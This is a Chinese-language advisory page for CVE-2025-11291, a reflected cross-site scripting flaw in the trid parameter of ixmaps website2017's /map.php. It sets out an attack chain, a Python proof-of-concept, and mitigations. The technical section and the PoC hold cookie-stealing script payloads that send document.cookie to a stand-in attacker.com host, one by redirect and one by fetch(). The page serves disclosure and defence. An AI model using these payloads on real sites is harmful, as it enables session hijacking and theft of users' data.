CVE-2025-11291：ixmaps website2017 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-11291

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ixmaps website2017

漏洞概述

CVE-2025-11291 是 ixmaps website2017 产品中发现的一个跨站脚本（XSS）安全漏洞。该漏洞存在于受影响版本的 /map.php 文件中，具体位于 HTTP GET 请求处理器的 trid 参数处。攻击者可以通过远程方式向该参数注入恶意的脚本代码，由于应用程序未对用户输入进行充分的过滤和转义处理，导致恶意脚本能够在受害者的浏览器中执行。

该漏洞的 CVSS 3.1 评分为 4.3，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），但需要用户交互（UI:R）才能触发漏洞利用。从影响范围来看，该漏洞对机密性影响为低（C:L），对完整性影响为低（I:L），对可用性无影响（A:N）。

值得注意的是，该产品采用持续交付与滚动发布模式，因此无法确定具体的受影响版本范围或已修复的版本信息。此外，漏洞发现者曾尝试联系厂商进行协调披露，但厂商未作出任何回应。目前该漏洞的利用代码已公开发布，可能被恶意攻击者利用，对使用该产品的用户构成安全威胁。

技术细节

该漏洞的技术原理在于 ixmaps website2017 的 /map.php 组件在处理 HTTP GET 请求时，未对 trid 参数进行适当的输入验证和输出编码。攻击者可以构造包含恶意 JavaScript 代码的特制 URL，当受害者点击或访问该 URL 时，恶意代码将被注入到响应页面中并在受害者的浏览器上下文中执行。

具体利用方式如下：
1. 攻击者构造一个包含恶意 payload 的 URL，目标参数为 trid，例如：`http://target/map.php?trid=<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>`
2. 由于应用程序直接将 trid 参数的值输出到 HTML 页面中而未进行 HTML 实体编码，导致恶意脚本被浏览器解析执行。
3. 攻击者可以利用该漏洞窃取用户的会话 Cookie、劫持用户会话、进行钓鱼攻击或在受害者浏览器中执行任意 JavaScript 代码。

该漏洞属于反射型 XSS（Reflected XSS），需要用户交互（如点击恶意链接）才能触发。由于无需认证即可利用，且利用代码已公开，攻击者可以轻易地发起攻击活动。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统使用 ixmaps website2017 产品，并定位到 /map.php 端点存在 trid 参数。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意 JavaScript 代码的特制 URL，将 payload 注入到 trid 参数中，如 /map.php?trid=<script>...</script>。

STEP 3

步骤3：诱导受害者访问

攻击者通过钓鱼邮件、社交工程或其他方式诱导受害者点击恶意链接。

STEP 4

步骤4：恶意脚本执行

受害者的浏览器加载包含恶意脚本的页面，由于缺乏输入过滤，脚本在受害者浏览器上下文中执行。

STEP 5

步骤5：数据窃取或会话劫持

攻击者通过执行的恶意脚本窃取用户的 Cookie、会话令牌或其他敏感信息，进而劫持用户会话或进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11291 PoC - Reflected XSS in ixmaps website2017 /map.php
# Vulnerable parameter: trid
# Attack type: Reflected Cross-Site Scripting (XSS)

import requests

TARGET_URL = "http://target/map.php"

# Malicious JavaScript payload to steal cookies
payload = "<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>"

# Construct the exploit URL
params = {
    "trid": payload
}

exploit_url = f"{TARGET_URL}?trid={payload}"
print(f"[+] Exploit URL: {exploit_url}")

# Send the malicious request
response = requests.get(TARGET_URL, params=params)

# Check if the payload is reflected without sanitization
if payload in response.text:
    print("[+] Vulnerability confirmed! Payload reflected in response.")
    print("[+] XSS will execute in victim's browser when they visit this URL.")
else:
    print("[-] Payload not reflected. Target may be patched.")

# Alternative payload examples:
# Simple alert: <script>alert('XSS')</script>
# Cookie exfiltration: <script>fetch('http://attacker.com/?c='+document.cookie)</script>
# DOM manipulation: <script>document.body.innerHTML='Hacked'</script>

影响范围

ixmaps website2017 (commit 0c71cffa0162186bc057a76766bc97e9f5a3a2d0 及之前版本)

防御指南

临时缓解措施

由于厂商未对该漏洞披露作出回应且产品采用滚动发布模式，建议用户采取以下临时缓解措施：1）在 Web 应用防火墙（WAF）中添加针对 /map.php 端点 trid 参数的 XSS 防护规则，拦截包含 <script>、onerror、onload 等关键字的恶意请求；2）在反向代理层面配置输入过滤规则，对特殊字符进行 URL 编码或拦截；3）部署内容安全策略（CSP）头，限制页面脚本执行；4）将 Cookie 设置为 HTTPOnly 属性，降低会话被盗风险；5）监控 Web 服务器日志，及时发现可疑的访问行为；6）考虑使用其他维护活跃的替代产品。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11291
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11291
3 Details https://www.cvedetails.com/cve/CVE-2025-11291/
4 VulDB https://vuldb.com/cve/CVE-2025-11291
5 Link https://github.com/PlsRevert/CVEs/issues/2
6 Link https://github.com/PlsRevert/CVEs/issues/2#issue-3444474977
7 Link https://vuldb.com/?ctiid.327172
8 Link https://vuldb.com/?id.327172
9 Link https://vuldb.com/?submit.661179
10 Link https://github.com/PlsRevert/CVEs/issues/2
11 Link https://github.com/PlsRevert/CVEs/issues/2#issue-3444474977